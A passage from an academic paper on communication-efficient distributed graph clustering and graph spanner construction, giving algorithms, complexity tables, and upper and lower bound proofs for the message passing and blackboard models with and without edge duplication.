[17] studied distributed construction of a series of graph spanners in the message passing with and without duplication models. But there exists no prior work considering such constructions in the blackboard model, which has been a widely adopted communication model [1, 18, 19]. ## 2 Definitions and Notations A weighted undirected graph \(G(V,E,W)\) consists of a vertex set \(V\), an edge set \(E\) and a weight function \(W\) which assigns a weight \(W(e)\) to each edge \(e\in E\). \(W\) can be omitted from the presentation if it is clear from the context. Throughout the paper let \(n=|V|\) and \(m=|E|\) denote the number of vertices and the number of edges in \(G\) respectively, and let \(s\) be the number of remote sites at which \(G\) is observed. Let \(w\) be the maximum edge weight in \(G\), _i.e._, \(w=\max_{e}W(e)\). We denote by \(d_{G}(u,v)\) the _shortest-path distance_ from \(u\) to \(v\) in \(G\). An \(\alpha\)-spanner and a \(+\beta\)-spanner for \(G\) are subgraphs \(H(V,E^{\prime}\subseteq E)\) of \(G\) such that for every \(u,v\in V\), \(d_{H}(u,v)\leq\alpha*d_{G}(u,v)\) and \(d_{H}(u,v)\leq d_{G}(u,v)+\beta\), respectively. \begin{table} \begin{tabular}{|c|c|c|c|} \hline \multirow{2}{*}{Problem} & \multirow{2}{*}{Upper Bound} & \multicolumn{2}{c|}{Lower Bound} \\ \cline{3-4} & & Non-duplication & Duplication \\ \hline \((2k-1)\)-spanner & \(O(s+n^{1+1/k})\) & \(\Omega(s+n^{1+1/k}\max\{1,\frac{\log s}{s^{(1+1/k)/2}}\})\) & \(\Omega(s+n^{1+1/k}\log s)\) \\ \hline \(+2\) or \(3\)-spanner & \(O(s+n\sqrt{n+s})\) & \(\Omega(s+n^{3/2})\) & \(\Omega(s+n^{3/2}\log s)\) \\ \hline \(+k\)-spanner & \(O(s+n\sqrt{n+s})\) & \(\Omega(s+n^{4/3-o(1)})\) & \(\Omega(s+n^{4/3-o(1)}\log s)\) \\ \hline \end{tabular} \end{table} Table 1: Communication complexity of computing graph spanners in the blackboard model, where \(n\) is the number of vertices in the input graph and \(s\) is the number of sites. ## 3 Distributed Graph Clustering In this section, we state our distributed graph clustering algorithms in the message passing and blackboard with duplication models. We first discuss the challenges introduced by edge duplicates present at different sites and then show how we overcome them. **Definitions.** Define the graph _Laplacian_ of a graph \(G\) as \(L=D-A\), where \(A\) is the adjacency matrix of \(G\) and \(D\) is the degree matrix, _i.e._, a diagonal matrix with the \(i\)-th diagonal entry equal to the sum over the \(i\)-th row of \(A\). A \((1+\epsilon)\)-_spectral sparsifier_ of \(G\), denoted as \((1+\epsilon)\)-\(SS(G)\), is a (possibly re-weighted) subgraph \(H\) of \(G\) such that for every \(x\in R^{n}\), the inequality \[(1-\epsilon)x^{T}L_{G}x\leq x^{T}L_{H}x\leq(1+\epsilon)x^{T}L_{G}x\] holds. Each edge \(e\) in \(G\) has _resistance_ \(R(e)=1/W(e)\), and the _effective resistance_ between any two vertices \(u\) and \(v\) in \(G\), denoted as \(R_{G}(u,v)\), is defined as the potential difference that has to be applied between them in order to drive one unit of current through the network \(G\). **Challenges.** Distributed graph clustering algorithms designed for non-duplication models cannot be easily extended to duplication models. We illustrate this using [10] in the message passing model as an example: every site \(S_{i}\) constructs a spectral sparsifier of its local graph \(G_{i}(V,E_{i})\) as a synopsis \(H_{i}\) and then transmits \(H_{i}\), instead of \(G_{i}\), to the coordinator.
Upon receiving \(H_{i}\) from all sites, the coordinator takes their union, \(H=\cup_{i=1}^{s}H_{i}\), as the constructed structure. The algorithm is based on the decomposability property of spectral sparsifiers. To see this, for every \(i\in[1,s]\), by the definition of spectral sparsifiers, we have for every vector \(x\in R^{n}\), \((1-\epsilon)x^{T}L_{G_{i}}x\leq x^{T}L_{H_{i}}x\leq(1+\epsilon)x^{T}L_{G_{i}}x.\) Summing all inequalities for \(i\in[1,s]\), we get that \[(1-\epsilon)\sum_{i\in[1,s]}x^{T}L_{G_{i}}x\leq\sum_{i\in[1,s]}x^{T}L_{H_{i}}x \leq(1+\epsilon)\sum_{i\in[1,s]}x^{T}L_{G_{i}}x.\] In the non-duplication model, it is easy to check that \(\sum_{i=1}^{s}L_{G_{i}}=L_{G}\) by the definition of the Laplacian matrix. Then the above inequality is equivalent to \[(1-\epsilon)x^{T}L_{G}x\leq x^{T}L_{H}x\leq(1+\epsilon)x^{T}L_{G}x, \tag{1}\] which shows that \(H\) is a \((1+\epsilon)\)-spectral sparsifier of \(G\). Under the duplication model, however, it is clear that \(\sum_{i=1}^{s}L_{G_{i}}\neq L_{G}\) and thus Inequality (1) no longer holds. In other words, the structure \(H\) constructed using the same principle is not a spectral sparsifier of \(G\). See Figure 1 for an illustrative example. **Proposed Method.** Restoring the decomposability of spectral sparsifiers in the duplication models appears to be quite challenging. We avoid it by having all sites cooperate to construct a spectral sparsifier of the distributed graph at the coordinator, which can then obtain clustering results by any standard clustering algorithm. A standard method of computing spectral sparsifiers [10] is to sample each edge in the input graph with a probability proportional to its effective resistance and then include the sampled edges (after appropriate weight rescaling) into the sparsifier. But, when there are duplicated edges across different sites, an edge \((u,v)\) may get sampled more than once at different sites, thereby resulting in multiple edges of possibly different weights between \(u\) and \(v\), _e.g._, edges \(e_{1}^{1}\) and \(e_{1}^{2}\) in Figure 1. It is unclear how to process these edges to guarantee that the resulting structure is always a spectral sparsifier. As in Figure 1, simply taking the union by summing edge weights does not produce a valid spectral sparsifier. Instead of using the classic sampling method, we propose to make use of the fact that spectral sparsifiers can be constructed by graph spanners [10] to compute spectral sparsifiers at the coordinator. The connection between spectral sparsifiers and graph spanners allows us to convert spectral sparsification to graph spanner construction and uniform sampling under duplication models. \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline \multirow{2}{*}{Problem} & \multicolumn{2}{c|}{Upper Bound} & \multicolumn{2}{c|}{Lower Bound} \\ \cline{2-5} & Non-duplication & Duplication & Non-duplication & Duplication \\ \hline \((2k-1)\)-spanner & \(O(ks^{1/2-1/(2k)}n^{1+1/k}+snk)\) & \(O(sn^{1+1/k})\) & \(\Omega(ks^{1/2-1/(2k)}n^{1+1/k}+sn)\) & \(\Omega(sn^{1+1/k})\) \\ \hline \(+2\) or \(3\)-spanner & \(O(\sqrt{s}n^{3/2}+sn)\) & \(O(sn^{3/2})\) & \(\Omega(\sqrt{s}n^{3/2}+sn)\) & \(\Omega(sn^{3/2})\) \\ \hline \(+k\)-spanner & \(O(\sqrt{s/k}\,n^{3/2}+snk)\) & \(O(sn^{3/2})\) & \(\Omega(n^{4/3-o(1)}+sn)\) & \(\Omega(sn^{4/3-o(1)})\) \\ \hline \end{tabular} \end{table} Table 2: Communication complexity of computing graph spanners in the message passing model [12].
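To make the failure of decomposability under duplication concrete, the following minimal sketch (a toy three-vertex example of our own; the weights are arbitrary) builds the Laplacians directly and confirms that the sum of the per-site Laplacians no longer equals \(L_{G}\) once an edge resides at two sites.

```python
import numpy as np

def laplacian(n, weighted_edges):
    """Graph Laplacian L = D - A from a list of (u, v, w) triples on vertices 0..n-1."""
    L = np.zeros((n, n))
    for u, v, w in weighted_edges:
        L[u, u] += w
        L[v, v] += w
        L[u, v] -= w
        L[v, u] -= w
    return L

n = 3
E1 = [(0, 1, 1.0), (1, 2, 1.0)]                  # edges held by site S_1
E2 = [(0, 1, 1.0), (0, 2, 1.0)]                  # edges held by site S_2; (0, 1) is duplicated
E  = [(0, 1, 1.0), (1, 2, 1.0), (0, 2, 1.0)]     # the distributed graph G itself

print(np.allclose(laplacian(n, E1) + laplacian(n, E2), laplacian(n, E)))
# False: the duplicated edge (0, 1) is counted twice, so sum_i L_{G_i} != L_G,
# and the union of local sparsifiers need not satisfy Inequality (1).
```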
In the followings, we first introduce the algorithm of [10] and then discuss how to adapt the algorithm in the message-passing and blackboard under duplication models. **The algorithm of [10].** Given a weighted graph, their algorithm first determines a set of edges that has small effective resistance through graph spanners. Specifically, it constructs a \(t\)-bundle \(\log n\)-spanner \(J=J_{1}\cup J_{2}\cup\cdots\cup J_{t}\), that is, a sequence of \(\log n\)-spanners \(J_{i}\) for each graph \(G_{i}=G-\cup_{j=1}^{i-1}J_{j}\) with \(1\leq i\leq t=O(\epsilon^{-2}\log n)\). Intuitively, it peels off a spanner \(J_{i}\) from the graph \(G_{i}\) to get \(G_{i+1}\) before computing the next spanner \(J_{i+1}\), _i.e._, \(J_{1}\) is a spanner of \(G\), \(J_{2}\) is a spanner of \(G-J_{1}\), _etc_. The \(t\)-bundle spanner guarantees that each _non-spanner_ edge (edge not in the spanner) has \(t\) edge-disjoint paths between its endpoints in the spanner (and thus in \(G\)), serving as a certificate for its small effective resistance. The algorithm then uniformly samples each non-spanner edge with a fixed constant probability, _e.g._, \(0.25\) and scales the weight of each sampled edge proportionally, _e.g._, by \(4\) to preserve the edge's expectation. By the matrix concentration bounds, it is guaranteed that the spanner together with the sampled non-spanner edges are a moderately sparse spectral sparsifier, in which the number of edges has been reduced by a constant factor. The desirable spectral sparsifier can be obtained by repeating the process until we get a sufficient sparsity, which happens after logarithmic iterations. **Weighted Graph Spanners.** An important building block in [10] is the construction of graph spanners of stretch factor \(\log n\), which can be used to construct the \(t\)-bundle \(\log n\)-spanner. Unfortunately, there is no algorithm that can generate such a spanner under the duplication models. [11] developed an algorithm for constructing \((2k-1)\)-spanners in unweighted graphs under the message passing with duplication model through the implementation of the greedy algorithm [1]. But the algorithm does not work in weighted graphs, where the greedy algorithm would need to process the edges in nondecreasing order of their weights. This seems to be a notable obstacle in both the message passing model and the blackboard model. In this paper, we first propose an algorithm for constructing \((4k-2)\)-spanners in weighted graphs under the message passing with duplication model. We are able to overcome the challenge in weighted graphs at the expense of a larger stretch factor \(4k-2\). However, this is sufficient for the construction of \(\log n\)-spanners in weighted graphs by setting the parameter \(k=O(\log n)\). Specifically, we divide the range of edge weights \([1,w]\) into logarithmic intervals, where the maximum edge weight \(w\) is assumed to be polynomial in \(n\)1. Then we process edges in each logarithmic scale \([2^{i-1},2^{i})\), where \(1\leq i\leq log_{2}(hw)\), as follows. Each site \(S_{j}\) in order decides which of its edge \(e\in E_{j}\) of weight in \([2^{i-1},2^{i})\) to include into the current spanner \(H\). If including the edge \(e\) results in a cycle of at most \(2k-1\) edges, then the shortest distance between \(e\)'s endpoints in the current spanner is guaranteed to be less than \((4k-2)W(e)\) (see our proof below). Thus the edge can be discarded. Otherwise, we update the current spanner \(H\) by including \(e\). 
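To make the per-edge rule just described concrete, here is a minimal single-site sketch of our own (not the paper's Alg. 1 pseudocode): within a weight bucket \([2^{i-1},2^{i})\), an edge is discarded when its endpoints are already joined in the current spanner \(H\) by a path of at most \(2k-1\) edges (so that adding it would close a cycle of at most \(2k\) edges), and is added to \(H\) otherwise.

```python
def within_hops(adj, src, dst, max_hops):
    """True if dst is reachable from src using at most max_hops edges of the adjacency dict adj."""
    if src == dst:
        return True
    frontier, seen = {src}, {src}
    for _ in range(max_hops):                 # breadth-first search, one level per hop
        nxt = set()
        for u in frontier:
            for v in adj.get(u, ()):
                if v == dst:
                    return True
                if v not in seen:
                    seen.add(v)
                    nxt.add(v)
        if not nxt:
            return False
        frontier = nxt
    return False

def greedy_bucket_pass(local_edges, H_adj, k):
    """One site's pass over its edges from a single weight bucket [2^(i-1), 2^i).

    H_adj is the current spanner as an adjacency dict {vertex: set of neighbours};
    it is updated in place, and the edges this site adds are returned.
    """
    added = []
    for (u, v, w) in local_edges:
        if not within_hops(H_adj, u, v, 2 * k - 1):   # no short path yet: keep the edge
            H_adj.setdefault(u, set()).add(v)
            H_adj.setdefault(v, set()).add(u)
            added.append((u, v, w))
    return added
```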
After completing the processing of \(E_{j}\), \(S_{j}\) forwards the possibly updated spanner \(H\) to the next site. The algorithm is summarized in Alg. 1. Footnote 1: This is a common and practical assumption for modern graphs. **Theorem 1**.: _Given a weighted graph and a parameter \(k>1\), Alg. 1 constructs a \((4k-2)\)-spanner using communication cost \(\tilde{O}(sn^{1+1/k})\) in the message passing with or without duplication model._ Proof.: We first prove that the stretch factor is \(4k-2\). For each edge \((u,v)\in E\), if \((u,v)\not\in H\), it must be that including the edge \((u,v)\) would close a cycle of length \(\leq 2k\). That is, there exists a path \(P\) of \(\leq 2k-1\) edges between \(u\) and \(v\) in \(H\). Since we process edges in logarithmic scales, the edge weights in \(P\) cannot be larger than \(2W(u,v)\). Thus the length of the path \(P\) is at most \((4k-2)W(u,v)\). Therefore, the output \(H\) is a \((4k-2)\)-spanner. We then prove the communication cost. By construction, the output graph \(H\) has girth (the minimum number of edges in a cycle contained in the graph) larger than \(2k\). It is well known that a graph with girth larger than \(2k\) has \(O(n^{1+1/k})\) edges [1]. Then \(H\) always has \(O(n^{1+1/k})\) edges throughout the processing of each logarithmic interval. Thus the total communication cost is \(\tilde{O}(sn^{1+1/k})\). The algorithm works in both the duplication and non-duplication settings, which do not affect the communication complexity. Alg. 1 can be extended to the blackboard model with the following modification: In Line 10, if site \(S_{j}\) does change \(H\) by adding some edge(s), it transmits the updated spanner \(H\) to the blackboard, instead of the next site; otherwise, it sends a special marker of one bit to the blackboard to indicate that it has completed the processing. The results are summarized in Theorem 2. In Section 4, we will show that the stretch factor can be reduced to \(2k-1\) in unweighted graphs. **Theorem 2**.: _The communication complexity of constructing a \((4k-2)\)-spanner in weighted graphs under the blackboard with or without duplication model is \(\tilde{O}(s+n^{1+1/k})\). In unweighted graphs, the stretch factor can be reduced to \(2k-1\)._ **Constructing \(t\)-bundle \(\log n\)-spanner.** Recall that a \(t\)-bundle \(\log n\)-spanner is \(J=J_{1}\cup J_{2}\cup\cdots\cup J_{t}\), where \(J_{i}\) is a \(\log n\)-spanner for the graph \(G_{i}=G-\cup_{j=1}^{i-1}J_{j}\), for \(1\leq i\leq t\). When \(i=1\), \(G_{1}=G\) is a distributed graph with each site \(S_{j}\) having edge set \(E_{j}\). We can use Alg. 1 with \(k=(2+\log n)/4\) to compute a \(\log n\)-spanner \(J_{1}\) of \(G_{1}\). For \(2\leq i\leq t\), \(G_{i}=G_{i-1}-J_{i-1}\) is again a distributed graph: each site \(S_{j}\) knows which of its edges \(E_{j}\) were included in \(J_{1},J_{2},\cdots,J_{i-1}\), and those edges are excluded from its edge set, \(E_{j}-J_{1}-J_{2}-\cdots-J_{i-1}\). Therefore, the construction of a \(t\)-bundle \(\log n\)-spanner invokes Alg. 1 \(t\) times. Because \(t=O(\epsilon^{-2}\log n)\) and by Theorems 1 and 2, the total communication costs in the message passing and blackboard with duplication models are \(\tilde{O}(sn)\) and \(\tilde{O}(s+n)\), respectively. **Uniform Sampling.** After the spanner construction, the algorithm of [14] then uniformly samples each non-spanner edge with a fixed probability, _e.g._, 0.25, and scales the weight of each sampled edge proportionally, _e.g._, by 4.
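A centralized, purely illustrative sketch of one such sparsification round (bundle-spanner construction followed by fixed-probability sampling with weight rescaling) is given below; the routine `spanner_fn` is a placeholder for a \(\log n\)-spanner construction such as Alg. 1, and none of the identifiers come from the paper.

```python
import random

def sparsification_round(edges, spanner_fn, t, sample_p=0.25):
    """One round in the spirit of the algorithm described above (centralized illustration).

    edges      : list of (u, v, w) triples
    spanner_fn : placeholder returning a log(n)-spanner of its input as a sublist of edges
    t          : bundle size, t = O(eps^-2 * log n)
    """
    remaining, bundle = list(edges), []
    for _ in range(t):                          # peel off the t spanners J_1, ..., J_t
        J = spanner_fn(remaining)
        bundle.extend(J)
        J_set = set(J)
        remaining = [e for e in remaining if e not in J_set]
    kept = list(bundle)                         # bundle (spanner) edges are always kept
    for (u, v, w) in remaining:                 # non-spanner edges: fixed-probability sampling
        if random.random() < sample_p:
            kept.append((u, v, w / sample_p))   # rescale weight (here x4) to preserve expectation
    return kept
```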
We observe that sampling with a fixed probability is much more friendly to edge duplicates as compared to sampling with a varied probability used in traditional methods such as [1]. For example in Figure 1, if the duplicates \(e_{1}^{1}\) and \(e_{1}^{2}\) of \(e_{1}\) are both sampled (under a fixed probability 0.25), they still have the same weight \(4W(e_{1})\) and are edge duplicates again in the next iteration. If one of them, say \(e_{1}^{1}\), is not sampled, it is removed from the (local) graph at site \(S_{1}\) and will not formulate duplicates with \(e_{1}^{2}\) at site \(S_{2}\). In contrast, non-uniform sampling could result in sampled edges of rather different weights, which may not be even considered as duplicates. However, uniform sampling under duplication models is still very challenging: if a fixed probability is used for every edge, an edge with \(d\) duplicates across different sites is processed/sampled for \(d\) times, each at one of the \(d\) sites, and thus has a higher probability being sampled than another edge with smaller duplicates. This results in a non-uniform sampling. To achieve the uniform sampling, we suppose that the probability of an edge \(e\) residing at each of the sites is a known value \(r_{e}\). If we set the probability of random sampling at each site as \(p_{e}\), then the probability that the edge is not sampled at each site is \(1-p_{e}*r_{e}\). It can be derived that the probability that \(e\) is sampled by _at least_ one site is \(p=1-(1-p_{e}*r_{e})^{s}\). Since the values of \(r_{e}\) and \(s\) are known, we can tune the value of \(p_{e}\) to get the expected sampling probability \(p=0.25\). At some site, if \(e\) is sampled and added to \(H\), we update its presenting probability as \(p_{e}*r_{e}\), which will be used in the next iteration. Otherwise (if \(e\) is not sampled), it is discarded and will not participate in the next iteration. See the details in Algorithms 2 and 3. ``` 0:\(G(V,E),\epsilon\in(0,1)\), and probability \(r_{e}\) for each edge \(e\) 0:\(H\) 1:\(H\) with updated \(r_{e}^{\prime}\) for each edge \(e\in H\) 1:\(G_{1}\gets G\); \(J\leftarrow\emptyset\) 2:for\(i\in[1,24\log^{2}n/\epsilon^{2}]\)do 3:\(J_{i}\gets Spanner(G_{i},(2+\log n)/4)\) 4:\(G_{i+1}\gets G_{i}-J_{i}\) 5:endfor 6:\(H\gets J\); \(r_{e}^{\prime}\gets r_{e}\) 7:for each site \(S_{i}\)do 8:for each edge \(e\in E_{i}-J\)do 9: Sample the edge \(e\) with probability \(p_{e}\) such that \(1-(1-p_{e}*r_{e})^{s}=0.25\); if \(e\) is sampled, adds \(e\) to \(H\) with a new weight \(4W(e)\) and set \(r_{e}^{\prime}\) to \(p_{e}*r_{e}\) 10:endfor 11:if it is the last iteration of the for-loop in Line 2 of Alg. 3 then 12: Transmit the sampled edges to the coordinator 13:endif 14:endfor 15:return\(H\); ``` **Algorithm 2**_Light-SS_ under duplication models The main algorithm, Alg. 3 computes \((1+\epsilon)\)-spectral sparsifier in \(\lceil\log\rho\rceil\) iterations of _Light-SS_, where \(\rho\) is a sparsification parameter. The communication cost of _Light-SS_ is composed of the cost for the bundle spanner construction and the cost for non-spanner edge sampling. If the sampled edges are transmitted to the coordinator, the communication cost \(\tilde{O}(m)\) could be prohibitively large. To see this, the number of edges in the output \(G_{i}\) after each iteration is only reduced by a constant factor because the uniform sampling removes \(3/4\) of the non-spanner edges in expectation. 
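The calibration of the per-site sampling probability in _Light-SS_ admits a closed form: solving \(1-(1-p_{e}r_{e})^{s}=0.25\) gives \(p_{e}=(1-0.75^{1/s})/r_{e}\). A minimal numerical check of our own (the values of \(r_{e}\) and \(s\) below are illustrative, not from the paper) is:

```python
def per_site_probability(r_e, s, target=0.25):
    """Solve 1 - (1 - p_e * r_e)**s = target for p_e (valid as long as the result is <= 1)."""
    return (1.0 - (1.0 - target) ** (1.0 / s)) / r_e

r_e, s = 0.5, 8                                   # hypothetical edge-residence probability and site count
p_e = per_site_probability(r_e, s)
prob_some_site_samples = 1.0 - (1.0 - p_e * r_e) ** s
print(round(prob_some_site_samples, 6))           # 0.25, the fixed rate used above
# Rescaling a sampled edge's weight by 4 then keeps its expected weight equal to W(e).
```

With this calibration in place, the remaining question for the communication cost is when the sampled edges are actually transmitted, which is addressed next.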
To improve the communication cost, we keep sampled edges in each iteration at local sites and do not transmit them to the coordinator except for the very last iteration. Then similar to the input graph \(G\), the output \(G_{i}\) for each iteration \(i\in[1,\lceil\log\rho\rceil-1]\) are also a distributed graph with possible edge duplication. Edge duplicates come from two sources: either the edge is included into the bundle spanner, or the edge is sampled by more than one site. In this way, the communication cost of _Light-SS_ (except for the last iteration) contains only the cost of constructing the bundle spanner. In the last iteration, the number of sampled edges must be small \(\tilde{O}(n)\), which is also the communication cost of their transmission. Therefore, the communication costs of Alg. 3 in the message passing and blackboard under duplication models are \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\), respectively. Putting all together, our results for distributed spectral sparsification under duplication models are summarized in Theorem 3 with its formal proof deferred to Appendix A. **Theorem 3** (Spectral Sparsification under Duplication Models).: _For a distributed graph \(G\) and parameters \(\epsilon\in(0,1)\) and \(\rho=O(\log n)\), Alg. 3 can construct a \((1+\epsilon)\)-spectral sparsifier for \(G\) of expected size \(\tilde{O}(n)\) using communication cost \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) in the message passing and blackboard with duplication models respectively, with probability at least \(1-n^{-c}\) for constant \(c\)._ **Clustering in the Sparsifier.** After obtaining the spectral sparsifier of the distributed graph, the coordinator applies a standard clustering algorithm such as [15] in the sparsifier to get the clustering results. We can guarantee a clustering quality nearly as good as the simple method of centralizing all graph edges and then performing a clustering algorithm. Before formally stating the results, we define a few notations. For every node set \(S\) in a graph \(G\), let its _volume_ and _conductance_ be \(vol_{G}(S)=\sum_{u\in S,v\in V}W(u,v)\) and \(\phi_{G}(S)=(\sum_{u\in S,v\in V-S}W(u,v))/vol_{G}(S)\), respectively. Intuitively, a small value of conductance \(\phi(S)\) implies that nodes in \(S\) are likely to form a cluster. A collection of subsets \(A_{1},\cdots,A_{k}\) of nodes is called a _(k-way) partition_ of \(G\) if (1) \(A_{i}\cap A_{j}=\emptyset\) for \(1\leq i\neq j\leq k\); and (2) \(\cup_{i=1}^{k}A_{i}=V\). The _k-way expansion constant_ is defined as \(\rho(k)=\min_{partitionA_{1},\cdots,A_{k}}\max_{i\in[1,k]}\phi(A_{i})\). A lower bound on \(\Upsilon_{G}(k)=\lambda_{k+1}/\rho(k)\) implies that \(G\) has exactly \(k\) well-defined clusters [14], where \(\lambda_{k+1}\) is the \(k+1\) smallest eigenvalue of the normalized Laplacian matrix. For any two sets \(X\) and \(Y\), their symmetric difference is defined as \(X\Delta Y=(X-Y)\cup(Y-X)\). **Theorem 4**.: _For a distributed graph \(G\) with \(\Upsilon_{G}(k)=\Omega(k^{3})\) and an optimal partition \(P_{1},\cdots,P_{k}\) achieving \(\rho(k)\) for some positive integer \(k\), there exists an algorithm that can output partition \(A_{1},\cdots,A_{k}\) at the coordinator such that for every \(i\in[1,k]\), \(vol(A_{i}\Delta P_{i})=O(k^{3}\Upsilon^{-1}vol(P_{i}))\) holds with probability at least \(1-n^{-c}\) for constant \(c\). 
The communication costs in the message passing and blackboard with duplication models are \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\), respectively._ To the best of our knowledge, this is the first algorithm for performing distributed graph clustering in the message passing and blackboard with edge duplication models. Remarkably, we can show that the communication costs are _optimal_, almost matching the communication lower bounds \(\Omega(ns)\) and \(\Omega(n+s)\), respectively. It is interesting to see that the communication costs incurred under duplication models are asymptotically the same as those under non-duplication models. In other words, edge duplication does not incur more communications in the graph clustering task, unlike other problems such as graph spanner construction as we will show in Section 4. Although we make an assumption on the edge distribution probability, we conjecture that when the assumption is relaxed, _i.e._, graph edges are presenting at different sites arbitrarily, the communication upper bounds remain the same in duplication models. We leave the study as an important future work. ## 4 Spanner Constructions in the Blackboard Model In this section, we study distributed constructions of graph spanners in the blackboard models with and without edge duplication. This, unfortunately, has not been investigated by prior work yet. We prove several interesting communication upper and lower bounds for typical graph spanners as summarized in Table 1. Due to limit of space, we cannot enumerate every result in Table 1. Hence, here we only describe the general \((2k-1)\)-spanners and move the additive spanners to the Appendix. We start with the duplication model, followed by the non-duplication model. The lower bounds obtained in Theorems 5 and 6 hold in both weighted and unweighted graphs and the rest results are on unweighted graphs. **Duplication Model.** In Section 3, we have provided the communication upper bound, \(\tilde{O}(s+n^{1+1/k})\), of constructing \((2k-1)\)-spanners in unweighted graphs in Theorem 2. We now show that the communication lower bound is \(\Omega(s+n^{1+1/k}\log s)\). **Theorem 5**.: _The communication lower bound of constructing a \((2k-1)\)-spanner in the blackboard with duplication model is \(\Omega(s+n^{1+1/k}\log s)\)._ Proof.: To prove this, we target a more general statement that works for every spanner. **Lemma 1**.: _Suppose there exists an \(n\)-vertex graph \(F\) of size \(f(n)\) such that \(F\) is the only spanner of itself or no proper subgraph \(F^{\prime}\) of \(F\) is a spanner. Then the communication complexity of computing a spanner in the blackboard with duplication model is \(\Omega(s+f(n)\log s)\) bits._ Proof.: Our proof is based on the reduction from the Multiparty Set-Disjointness problem (\(DISJ_{m,s}\)) to graph spanner computation. In \(DISJ_{m,s}\), \(s\) players receive inputs \(X_{1},X_{2},\cdots,X_{s}\subseteq\{1,\cdots,m\}\) and their goal is to determine whether or not \(\cap_{i=1}^{s}X_{i}=\emptyset\). Now we construct a distributed graph \(G\) from the graph \(F\) and an instance of \(DISJ_{f(n),s}\) as follows. We add edge \(e_{j}\) in \(F\) to site \(i\) if \(j\not\in X_{i}\) for \(1\leq j\leq f(n)\). If the coordinator outputs \(F\) as the spanner, we report \(\cap_{i=1}^{s}X_{i}=\emptyset\); otherwise we report \(\cap_{i=1}^{s}X_{i}\neq\emptyset\). It can be seen that the coordinator outputs \(F\) iff all its edges appear at some site, which is the case \(\cap_{i=1}^{s}X_{i}=\emptyset\). 
Finally, according to the communication lower bound of \(DISJ_{m,s}\) in the blackboard model [1], \(\Omega(s+m\log s)\), the communication complexity of computing a spanner is \(\Omega(s+f(n)\log s)\). For the lower bound of \((2k-1)\)-spanners, the Erdos's girth conjecture states that there exists a family of graphs \(F\) of girth \(2k+1\) and size \(\Omega(n^{1+1/k})\)[1]. This implies that there exists only one \((2k-1)\)-spanner of \(F\), that is \(F\) itself. It is because the deletion of any edge in \(F\) would result in that the distance between the endpoints of the edge becomes at least \(2k\). Then by Lemma 1, we get the lower bound \(\Omega(s+n^{1+1/k}\log s)\). **Non-Duplication Model.** In the non-duplication model, we prove a lower bound via a reduction from the lower bound for the duplication model. **Theorem 6**.: _The communication complexity of constructing a \((2k-1)\)-spanner in the blackboard without duplication model is \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\)._ Proof.: We can construct an instance of the \((2k-1)\)-spanner problem without duplication on \(s\) sites and \(n\) vertices from an instance of the \((2k-1)\)-spanner problem with duplication on \(s\) sites and \(n/\sqrt{s}\) vertices. Specifically, we construct a graph \(G^{\prime}\) with no duplication by replacing each vertex \(v\) by a set of vertices \(S_{v}\) of size \(\sqrt{s}\). Since there are at most \(s\) copies of an edge \((u,v)\) in the original graph \(G\) across the \(s\) sites, we can assign each server's copy to a distinct edge \((u^{\prime},v^{\prime})\in S_{u}\times S_{v}\) in \(G^{\prime}\). See Fig. 2 for an illustrating example of the construction. Then we apply an algorithm for the without duplication model, _e.g._, the algorithm in Theorem 2, to get a \((2k-1)\)-spanner \(H^{\prime}\) of \(G^{\prime}\). Finally, the coordinator computes a \((2k-1)\)-spanner \(H\) of \(G\) by including an edge \((u,v)\) in \(H\) if there is at least one edge between \(S_{u}\) and \(S_{v}\) in \(H^{\prime}\). To show the constructed \(H\) is a \((2k-1)\)-spanner of \(G\), let us consider an edge \((u,v)\in G\). By construction, there must be an edge \((u^{\prime},v^{\prime})\in S_{u}\times S_{v}\) in \(G^{\prime}\). Because \(H^{\prime}\) is a \((2k-1)\)-spanner of \(G^{\prime}\), it contains a path \(P^{\prime}\) of length at most \((2k-1)\cdot W(u,v)\) between \(u^{\prime}\) and \(v^{\prime}\). For every edge \((x^{\prime},y^{\prime})\) in \(P^{\prime}\) where \(x^{\prime}\in S_{x},y^{\prime}\in S_{y}\), we have included an edge \((x,y)\) in \(H\). Therefore, there exists a path \(P\) of length at most \((2k-1)\cdot W(u,v)\) between \(u\) and \(v\) in \(H\) and thus \(H\) is a \((2k-1)\)-spanner of \(G\). Since the lower bound in the duplication model is \(\Omega(s+n^{1+1/k}\log s)\) (Theorem 5), we have that the lower bound for the non-duplication model is \(\Omega(s+(n/\sqrt{s})^{1+1/k}\log s)=\Omega(s+n^{1+1/k}s^{-1/2-1/(2k)}\log s)\). Since representing the result itself needs \(\Omega(n^{1+1/k})\), combining this with the above result get the final lower bound, \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\). **Discussions.** We highlight several interesting observations from our results in Table 1 and prior results in Table 2. 1. We demonstrate that for graph spanner constructions, the blackboard model is powerful to significantly reduce the communication complexity compared to the message passing model. 
For instance in duplication models, computing the \((2k-1)\)-spanners incurs communication cost \(\tilde{O}(sn^{1+1/k})\) in the message passing model but only \(\tilde{O}(s+n^{1+1/k})\) in the blackboard model. This is not necessarily the case for all computing problems. For example, for computing the sum of bit vectors modulo two [13] and estimating large moments [14], the complexities are the same in both communication models. 2. In exchange for better communication bounds, spanners constructed in a distributed manner may include more edges than the smallest number of edges required in a centralized model. For example in \(+2\)-spanners and \(3\)-spanners, the number of edges in the constructed structure is \(n\sqrt{n+s}\), which is slightly larger than the optimal size \(n\sqrt{n}\) in a centralized model. It is still open to investigate how to reduce the communication cost while maintaining an optimal number of edges in the spanner.
Figure 2: Converting a graph with duplication on \(s\) sites and \(n/\sqrt{s}\) vertices into a graph without duplication on \(s\) sites and \(n\) vertices.
